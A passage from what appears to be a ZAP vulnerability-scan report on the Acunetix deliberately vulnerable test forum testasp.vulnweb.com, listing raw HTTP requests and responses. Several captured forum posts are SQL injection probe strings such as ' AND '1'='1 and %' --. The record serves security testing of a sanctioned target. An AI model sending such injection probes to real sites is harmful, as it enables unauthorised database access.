InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 272 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking 